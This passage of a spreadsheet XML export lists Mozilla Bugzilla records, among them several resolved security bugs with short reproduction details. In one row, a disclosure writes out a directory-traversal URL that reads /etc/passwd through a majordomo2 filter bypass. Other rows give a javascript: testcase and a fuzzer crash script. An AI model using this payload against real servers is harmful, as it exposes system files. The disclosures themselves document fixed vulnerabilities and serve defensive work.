          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6217" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6217" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q6217" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6217" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6217" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6217" t="n">
        <v>1</v>
      </c>
      <c r="U6217" t="n">
        <v>0</v>
      </c>
      <c r="V6217" t="n">
        <v>18</v>
      </c>
      <c r="W6217" t="inlineStr">
        <is>
          <t>window.open("javascript:alert(Components.stack)"); is the testcase :)</t>
        </is>
      </c>
      <c r="X6217" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6218">
      <c r="A6218" t="n">
        <v>381300</v>
      </c>
      <c r="B6218" t="inlineStr">
        <is>
          <t>2007-05-19 19:17:20 -0700</t>
        </is>
      </c>
      <c r="C6218" t="inlineStr">
        <is>
          <t>Frame spoofing is possible within a short time frame while the window is loading.</t>
        </is>
      </c>
      <c r="D6218" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6218" t="n">
        <v>0</v>
      </c>
      <c r="F6218" t="n">
        <v>0</v>
      </c>
      <c r="G6218" t="n">
        <v>3</v>
      </c>
      <c r="H6218" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6218" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6218" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6218" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L6218" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6218" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6218" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6218" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6218" t="inlineStr">
        <is>
          <t>[sg:low spoof] 1.8-branch only</t>
        </is>
      </c>
      <c r="Q6218" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6218" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6218" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6218" t="n">
        <v>1</v>
      </c>
      <c r="U6218" t="n">
        <v>1</v>
      </c>
      <c r="V6218" t="n">
        <v>28</v>
      </c>
      <c r="W6218" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
When opening a window from a script, it is possible to spoof the content of the newly opened window's frames within a short time frame, while the window is loading.
Because the exact time is non-constant and unknown, multiple attempt are carried out. The failed ones are silently discarded using a try catch block.
This is similar to Bug 343168.
Both the 'frames[x].document.open()' method (described in above bug) and a normal 'frames[x].document' method are shown to reliably produce the exploit.
Reproducible: Always
Steps to Reproduce:
See attached test case.</t>
        </is>
      </c>
      <c r="X6218" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6219">
      <c r="A6219" t="n">
        <v>631307</v>
      </c>
      <c r="B6219" t="inlineStr">
        <is>
          <t>2011-02-03 11:29:25 -0800</t>
        </is>
      </c>
      <c r="C6219" t="inlineStr">
        <is>
          <t>Possible to bypass fix for CVE-2011-0049 (majordomo2 directory traversal in 'help' command)</t>
        </is>
      </c>
      <c r="D6219" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:45 -0700</t>
        </is>
      </c>
      <c r="E6219" t="n">
        <v>1</v>
      </c>
      <c r="F6219" t="n">
        <v>1</v>
      </c>
      <c r="G6219" t="n">
        <v>5</v>
      </c>
      <c r="H6219" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6219" t="inlineStr">
        <is>
          <t>Security Assurance</t>
        </is>
      </c>
      <c r="J6219" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6219" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6219" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6219" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6219" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6219" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6219" t="inlineStr">
        <is>
          <t>[infrasec:input][ws:critical]</t>
        </is>
      </c>
      <c r="Q6219" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6219" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6219" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6219" t="n">
        <v>1</v>
      </c>
      <c r="U6219" t="n">
        <v>0</v>
      </c>
      <c r="V6219" t="n">
        <v>30</v>
      </c>
      <c r="W6219" t="inlineStr">
        <is>
          <t>Nikolas Sotiriu &lt;nsotiriu@sotiriu.de&gt; reported the following issue to security@ concerning a way to bypass the majordomo2 fix in bug 628064:
=================================================================
So the bug is that the majordomo2 path for the bug (628064) is absolut
terrible and not working.
See attachment 506481.
Check the regex ($file =~ s!/?\.\./?!!g;) do you see it :)
It deletes ../ but what happens if i ./.../ ?
./.../ becomes ../
http://bugzilla.org/cgi-bin/mj_wwwusr?passw=&amp;list=GLOBAL&amp;user=&amp;func=help&amp;extra=./..././..././..././..././..././..././..././.../etc/passwd
Maybe a regex like this is better:
$file =~ s/\.\.//g;
=================================================================</t>
        </is>
      </c>
      <c r="X6219" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6220">
      <c r="A6220" t="n">
        <v>890221</v>
      </c>
      <c r="B6220" t="inlineStr">
        <is>
          <t>2013-07-04 03:52:05 -0700</t>
        </is>
      </c>
      <c r="C6220" t="inlineStr">
        <is>
          <t>[FM Radio] pressing Hardware Volume keys don't increase/decrease FM Radio volume</t>
        </is>
      </c>
      <c r="D6220" t="inlineStr">
        <is>
          <t>2013-07-30 04:55:22 -0700</t>
        </is>
      </c>
      <c r="E6220" t="n">
        <v>1</v>
      </c>
      <c r="F6220" t="n">
        <v>1</v>
      </c>
      <c r="G6220" t="n">
        <v>6</v>
      </c>
      <c r="H6220" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6220" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6220" t="inlineStr">
        <is>
          <t>Gaia::FMRadio</t>
        </is>
      </c>
      <c r="K6220" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6220" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6220" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6220" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6220" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6220" t="inlineStr">
        <is>
          <t xml:space="preserve">[TD-57746][LeoVB+] </t>
        </is>
      </c>
      <c r="Q6220" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6220" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6220" t="inlineStr">
        <is>
          <t>1.1 QE4 (15jul)</t>
        </is>
      </c>
      <c r="T6220" t="n">
        <v>1</v>
      </c>
      <c r="U6220" t="n">
        <v>0</v>
      </c>
      <c r="V6220" t="n">
        <v>10</v>
      </c>
      <c r="W6220" t="inlineStr">
        <is>
          <t>1. Title: Not able to change the volume of FM radio with volume hardware keys
2. Precondition: when in homescreen, reduce the volume to fully ZERO
3. Tester's Action: 
		1. Open FM app
		2. Play FM app
		3. Adjust the volume either increase/decrease.
		4. No sound heard(No change in volume's behaviour)
4. Detailed Symptom (ENG.): After setting the volume to zero on home screen, user cannot hear the sound while FM playing(irrespective of increasing or decreasing hardware volume keys)
5. Expected : User should be able to control volume 
6. Reproducibility: Y
1)Frequency Rate : 100%
7.Gaia Master/v1-train : Reproduced
8.Gaia Revision: 0a8b1d7c70c5ec2b48e52c2cd7e463f47fa0b9cb</t>
        </is>
      </c>
      <c r="X6220" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6221">
      <c r="A6221" t="n">
        <v>1563019</v>
      </c>
      <c r="B6221" t="inlineStr">
        <is>
          <t>2019-07-02 13:24:10 -0700</t>
        </is>
      </c>
      <c r="C6221" t="inlineStr">
        <is>
          <t>Enable ASan in Rust code</t>
        </is>
      </c>
      <c r="D6221" t="inlineStr">
        <is>
          <t>2021-01-05 02:45:45 -0800</t>
        </is>
      </c>
      <c r="E6221" t="n">
        <v>1</v>
      </c>
      <c r="F6221" t="n">
        <v>1</v>
      </c>
      <c r="G6221" t="n">
        <v>7</v>
      </c>
      <c r="H6221" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6221" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6221" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6221" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6221" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6221" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6221" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6221" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6221" t="inlineStr"/>
      <c r="Q6221" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6221" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6221" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T6221" t="n">
        <v>1</v>
      </c>
      <c r="U6221" t="n">
        <v>0</v>
      </c>
      <c r="V6221" t="n">
        <v>9</v>
      </c>
      <c r="W6221" t="inlineStr">
        <is>
          <t>As far as I can tell, we don't currently sanitize Rust code in our ASan builds. Maybe we should, because of `unsafe` code.</t>
        </is>
      </c>
      <c r="X6221" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6222">
      <c r="A6222" t="n">
        <v>726264</v>
      </c>
      <c r="B6222" t="inlineStr">
        <is>
          <t>2012-02-10 22:43:16 -0800</t>
        </is>
      </c>
      <c r="C6222" t="inlineStr">
        <is>
          <t>(CVE-2012-3984) Firefox 10.0.1 : Navigation away from a page with multiple active &lt;select&gt; dropdown menu can be used for Spoofing And ClickJacking with XPI using window.open and geolocalisation</t>
        </is>
      </c>
      <c r="D6222" t="inlineStr">
        <is>
          <t>2024-06-02 18:39:48 -0700</t>
        </is>
      </c>
      <c r="E6222" t="n">
        <v>1</v>
      </c>
      <c r="F6222" t="n">
        <v>1</v>
      </c>
      <c r="G6222" t="n">
        <v>3</v>
      </c>
      <c r="H6222" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6222" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6222" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K6222" t="inlineStr">
        <is>
          <t>10 Branch</t>
        </is>
      </c>
      <c r="L6222" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6222" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6222" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6222" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6222" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+] cross-browser issue (Chrome, Opera)</t>
        </is>
      </c>
      <c r="Q6222" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6222" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6222" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T6222" t="n">
        <v>1</v>
      </c>
      <c r="U6222" t="n">
        <v>0</v>
      </c>
      <c r="V6222" t="n">
        <v>50</v>
      </c>
      <c r="W6222" t="inlineStr">
        <is>
          <t>Created attachment 596272
TESTCASE.ZIP
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Build ID: 20120208060813
Steps to reproduce:
Like bug 575294 , Firefox 10.0.1 shows the dropdown menu for &lt;select&gt; elements as an always-on-top chromeless window. It also allows arbitrary HTML content to be rendered in the &lt;option&gt; elements within the &lt;select&gt;.
Actual results:
This bug demonstrates than an attacker can cover a  XPI for evil.
I think this issue is critical.</t>
        </is>
      </c>
      <c r="X6222" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6223">
      <c r="A6223" t="n">
        <v>1303611</v>
      </c>
      <c r="B6223" t="inlineStr">
        <is>
          <t>2016-09-18 06:37:24 -0700</t>
        </is>
      </c>
      <c r="C6223" t="inlineStr">
        <is>
          <t>Inspector high cpu and memory usage (leak?) on twitch player page leading to firefox hang</t>
        </is>
      </c>
      <c r="D6223" t="inlineStr">
        <is>
          <t>2018-06-13 10:27:05 -0700</t>
        </is>
      </c>
      <c r="E6223" t="n">
        <v>1</v>
      </c>
      <c r="F6223" t="n">
        <v>1</v>
      </c>
      <c r="G6223" t="n">
        <v>3</v>
      </c>
      <c r="H6223" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6223" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J6223" t="inlineStr">
        <is>
          <t>Inspector</t>
        </is>
      </c>
      <c r="K6223" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L6223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6223" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6223" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6223" t="inlineStr"/>
      <c r="Q6223" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6223" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6223" t="inlineStr">
        <is>
          <t>Firefox 52</t>
        </is>
      </c>
      <c r="T6223" t="n">
        <v>1</v>
      </c>
      <c r="U6223" t="n">
        <v>1</v>
      </c>
      <c r="V6223" t="n">
        <v>14</v>
      </c>
      <c r="W6223" t="inlineStr">
        <is>
          <t>Created attachment 8792318
Screenshot with the issue.
Go to page with twitch player http://player.twitch.tv/?channel={any channel you want}
Open devtool inspector. Instantly cpu and memory usage goes up and parameters in inspector are highlighted as they were constantly changed.
See attached screenshot. This is main firefox process. CPU usage is not caused by decoding because this was done by flash. Note the drop in memory usage in the end, this is the point that firefox started freezing and couldn't play the video anymore.</t>
        </is>
      </c>
      <c r="X6223" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6224">
      <c r="A6224" t="n">
        <v>234540</v>
      </c>
      <c r="B6224" t="inlineStr">
        <is>
          <t>2004-02-16 10:49:43 -0800</t>
        </is>
      </c>
      <c r="C6224" t="inlineStr">
        <is>
          <t>"Take bug" on create attachment screen does not send original assignee mail</t>
        </is>
      </c>
      <c r="D6224" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E6224" t="n">
        <v>1</v>
      </c>
      <c r="F6224" t="n">
        <v>1</v>
      </c>
      <c r="G6224" t="n">
        <v>4</v>
      </c>
      <c r="H6224" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6224" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6224" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K6224" t="inlineStr">
        <is>
          <t>2.17.6</t>
        </is>
      </c>
      <c r="L6224" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6224" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6224" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6224" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6224" t="inlineStr"/>
      <c r="Q6224" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6224" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6224" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T6224" t="n">
        <v>1</v>
      </c>
      <c r="U6224" t="n">
        <v>0</v>
      </c>
      <c r="V6224" t="n">
        <v>5</v>
      </c>
      <c r="W6224" t="inlineStr">
        <is>
          <t>(seen on http://landfill.bugzilla.org/bugzilla-tip/ as well as bmo)
Clicking "Take bug" on the create attachment screen does not send the original
assignee an email. In fact, the orig. assignee is not listed on the "Changes
Submitted" page at all.</t>
        </is>
      </c>
      <c r="X6224" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6225">
      <c r="A6225" t="n">
        <v>1580506</v>
      </c>
      <c r="B6225" t="inlineStr">
        <is>
          <t>2019-09-11 08:07:19 -0700</t>
        </is>
      </c>
      <c r="C6225" t="inlineStr">
        <is>
          <t>Pointer Lock warning is no longer shown</t>
        </is>
      </c>
      <c r="D6225" t="inlineStr">
        <is>
          <t>2022-01-10 05:28:46 -0800</t>
        </is>
      </c>
      <c r="E6225" t="n">
        <v>1</v>
      </c>
      <c r="F6225" t="n">
        <v>1</v>
      </c>
      <c r="G6225" t="n">
        <v>2</v>
      </c>
      <c r="H6225" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6225" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6225" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6225" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6225" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6225" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6225" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main69.0.1+][rca - Coding Error]</t>
        </is>
      </c>
      <c r="Q6225" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6225" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6225" t="inlineStr">
        <is>
          <t>Firefox 71</t>
        </is>
      </c>
      <c r="T6225" t="n">
        <v>1</v>
      </c>
      <c r="U6225" t="n">
        <v>0</v>
      </c>
      <c r="V6225" t="n">
        <v>16</v>
      </c>
      <c r="W6225" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]:
Critical security UI not showing up. Would be great to get this as a dot-release ride-along at least.
STR: Go to https://permission.site/ and click on "pointer lock". You *should* see a huge warning showing up that the website has taken control of your cursor and you can get it back, but it doesn't show up.
This was regressed by bug 1533948. Neil, can you please take a look at this bug?</t>
        </is>
      </c>
      <c r="X6225" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6226">
      <c r="A6226" t="n">
        <v>1180064</v>
      </c>
      <c r="B6226" t="inlineStr">
        <is>
          <t>2015-07-02 18:02:06 -0700</t>
        </is>
      </c>
      <c r="C6226" t="inlineStr">
        <is>
          <t>Crash [@ PodAssign&lt;js::jit::Pool&gt;] with OOM</t>
        </is>
      </c>
      <c r="D6226" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:19 -0700</t>
        </is>
      </c>
      <c r="E6226" t="n">
        <v>1</v>
      </c>
      <c r="F6226" t="n">
        <v>1</v>
      </c>
      <c r="G6226" t="n">
        <v>3</v>
      </c>
      <c r="H6226" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6226" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6226" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6226" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6226" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6226" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6226" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6226" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6226" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][fuzzblocker][adv-main44+]</t>
        </is>
      </c>
      <c r="Q6226" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6226" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6226" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6226" t="n">
        <v>1</v>
      </c>
      <c r="U6226" t="n">
        <v>0</v>
      </c>
      <c r="V6226" t="n">
        <v>9</v>
      </c>
      <c r="W6226" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision f5e3bacfb60e (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-simulator=arm --enable-debug, run with --fuzzing-safe --thread-count=2 --arm-asm-nop-fill=1 --arm-hwcap=vfp --ion-check-range-analysis --ion-extra-checks --ion-offthread-compile=off):
function oomTest(f) {
    var i = 1;
    do {
        try {
            oomAtAllocation(i);
            f();
        } catch (e) {
        }
        more = resetOOMFailure();
        i++;
    } while(more);
}
oomTest(function() {
    newGlobal('================================================================')     
});
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x08696290 in PodAssign&lt;js::jit::Pool&gt; (aSrc=0xffffa718, aDst=&lt;optimized out&gt;) at ../../dist/include/mozilla/PodOperations.h:87
#0  0x08696290 in PodAssign&lt;js::jit::Pool&gt; (aSrc=0xffffa718, aDst=&lt;optimized out&gt;) at ../../dist/include/mozilla/PodOperations.h:87
#1  PodCopy&lt;js::jit::Pool&gt; (aNElem=1, aSrc=0xffffa718, aDst=&lt;optimized out&gt;) at ../../dist/include/mozilla/PodOperations.h:107
#2  js::jit::AssemblerBufferWithConstantPools&lt;1024u, 4u, js::jit::Instruction, js::jit::Assembler&gt;::finishPool (this=0xffffa6c8) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:723
#3  0x08696728 in js::jit::AssemblerBufferWithConstantPools&lt;1024u, 4u, js::jit::Instruction, js::jit::Assembler&gt;::insertEntryForwards (this=this@entry=0xffffa6c8, numInst=numInst@entry=1, numPoolEntries=numPoolEntries@entry=0, inst=inst@entry=0xffff9fc0 "\377\377\377\352|Ą\t\350\237\377\377\220\202b\b\v", data=data@entry=0x0) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:545
#4  0x0864ee3a in js::jit::AssemblerBufferWithConstantPools&lt;1024u, 4u, js::jit::Instruction, js::jit::Assembler&gt;::allocEntry (this=this@entry=0xffffa6c8, inst=inst@entry=0xffff9fc0 "\377\377\377\352|Ą\t\350\237\377\377\220\202b\b\v", markAsBranch=markAsBranch@entry=false, pe=0x0, data=0x0, numPoolEntries=0, numInst=1) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:588
#5  0x0864fe45 in putInt (markAsBranch=false, value=3942645759, this=0xffffa6c8) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:610
#6  insertNopFill (this=0xffffa6c8) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:508
#7  allocEntry (numInst=1, numPoolEntries=0, data=0x0, pe=0x0, markAsBranch=false, inst=0xffff9fb0 "", this=0xffffa6c8) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:571
#8  putInt (markAsBranch=false, value=3852009472, this=0xffffa6c8) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:610
#9  js::jit::Assembler::writeInst (this=this@entry=0xffffa4cc, x=3852009472) at js/src/jit/arm/Assembler-arm.cpp:1352
#10 0x0865d8c8 in as_dtr (c=&lt;optimized out&gt;, addr=..., rt=..., mode=&lt;optimized out&gt;, size=&lt;optimized out&gt;, ls=&lt;optimized out&gt;, this=&lt;optimized out&gt;) at js/src/jit/arm/Assembler-arm.cpp:1667
#11 js::jit::MacroAssemblerARM::ma_dataTransferN (this=this@entry=0xffffa4cc, ls=js::jit::IsLoad, rn=..., offset=offset@entry=..., rt=..., mode=mode@entry=js::jit::Offset, cc=cc@entry=js::jit::Assembler::Always, IsSigned=true, size=32) at js/src/jit/arm/MacroAssembler-arm.cpp:1268
#12 0x0865f1bd in js::jit::MacroAssemblerARM::ma_dtr (this=this@entry=0xffffa4cc, rt=..., rt@entry=..., addr=..., mode=mode@entry=js::jit::Offset, cc=cc@entry=js::jit::Assembler::Always, ls=js::jit::IsLoad) at js/src/jit/arm/MacroAssembler-arm.cpp:1075
#13 0x0865f9d7 in ma_ldr (cc=js::jit::Assembler::Always, mode=js::jit::Offset, rt=..., addr=..., this=this@entry=0xffffa4cc) at js/src/jit/arm/MacroAssembler-arm.cpp:1099
#14 js::jit::MacroAssemblerARMCompat::loadPtr (this=this@entry=0xffffa4cc, address=..., dest=dest@entry=...) at js/src/jit/arm/MacroAssembler-arm.cpp:2215
#15 0x0847a477 in EmitCallIC (masm=..., patchOffset=&lt;synthetic pointer&gt;) at js/src/jit/arm/SharedICHelpers-arm.h:46
#16 js::jit::BaselineCompiler::emitIC (this=0xffffa4c0, stub=0xf7a21a28, kind=js::jit::ICEntry::Kind_NonOp) at js/src/jit/BaselineCompiler.cpp:511
#17 0x0847adca in emitNonOpIC (stub=&lt;optimized out&gt;, this=0xffffa4c0) at js/src/jit/BaselineCompiler.h:256
#18 js::jit::BaselineCompiler::emitArgumentTypeChecks (this=this@entry=0xffffa4c0) at js/src/jit/BaselineCompiler.cpp:766
#19 0x08495330 in js::jit::BaselineCompiler::emitPrologue (this=this@entry=0xffffa4c0) at js/src/jit/BaselineCompiler.cpp:437
#20 0x084b720b in js::jit::BaselineCompiler::compile (this=this@entry=0xffffa4c0) at js/src/jit/BaselineCompiler.cpp:98
#21 0x084b8b51 in js::jit::BaselineCompile (cx=cx@entry=0xf7a80040, script=0xf574b1f0, forceDebugInstrumentation=false) at js/src/jit/BaselineJIT.cpp:263
#22 0x084b9371 in CanEnterBaselineJIT (cx=cx@entry=0xf7a80040, script=..., script@entry=..., osrFrame=osrFrame@entry=0x0) at js/src/jit/BaselineJIT.cpp:302
#23 0x084b9707 in js::jit::CanEnterBaselineMethod (cx=cx@entry=0xf7a80040, state=...) at js/src/jit/BaselineJIT.cpp:370
#24 0x082bf62f in js::RunScript (cx=cx@entry=0xf7a80040, state=...) at js/src/vm/Interpreter.cpp:641
#25 0x082bfe83 in js::Invoke (cx=cx@entry=0xf7a80040, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:731
#26 0x082c1133 in js::Invoke (cx=cx@entry=0xf7a80040, thisv=..., fval=..., argc=argc@entry=0, argv=argv@entry=0xf59ffec8, rval=rval@entry=...) at js/src/vm/Interpreter.cpp:768
#27 0x084b5e8e in js::jit::DoCallFallback (cx=0xf7a80040, frame=0xf59ffef8, stub_=0xf7a21510, argc=0, vp=0xf59ffeb8, res=...) at js/src/jit/BaselineIC.cpp:9859
#28 0x0867a8f3 in js::jit::Simulator::softwareInterrupt (this=0xf7a7f000, instr=0xf7a02e14) at js/src/jit/arm/Simulator-arm.cpp:2171
#29 0x0867ab36 in js::jit::Simulator::decodeType7 (this=0xf7a7f000, instr=0xf7a02e14) at js/src/jit/arm/Simulator-arm.cpp:3270
#30 0x08678e45 in js::jit::Simulator::instructionDecode (this=this@entry=0xf7a7f000, instr=instr@entry=0xf7a02e14) at js/src/jit/arm/Simulator-arm.cpp:4189
#31 0x0867c6ac in execute&lt;false&gt; (this=0xf7a7f000) at js/src/jit/arm/Simulator-arm.cpp:4244
#32 js::jit::Simulator::callInternal (this=this@entry=0xf7a7f000, entry=entry@entry=0xf7fc91f8 "\377\377\377\352\360O-\351\377\377\377\352\004\320M\342\377\377\377\352\020\212-\355\377\377\377\352\r\200\240\341\377\377\377\352h\220\235\345\377\377\377\352\r\260\240\341\377\377\377\352t\240\235\345\377\377\377", &lt;incomplete sequence \352&gt;) at js/src/jit/arm/Simulator-arm.cpp:4332
